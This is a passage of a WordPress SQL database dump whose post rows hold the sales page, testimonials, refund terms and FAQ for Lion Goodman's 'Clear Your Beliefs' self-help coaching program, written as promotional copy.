you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-12 14:54:35', '2014-12-12 19:54:35', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2025, 2, '2014-12-12 14:43:17', '2014-12-12 19:43:17', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n \n\n<p style="text-align: left">The same thing is true in your subconscious mind:</p>\n \n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n \n\n<p style="text-align: left"><strong>It''s that simple.</strong></p>\n \n\n&nbsp;\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" 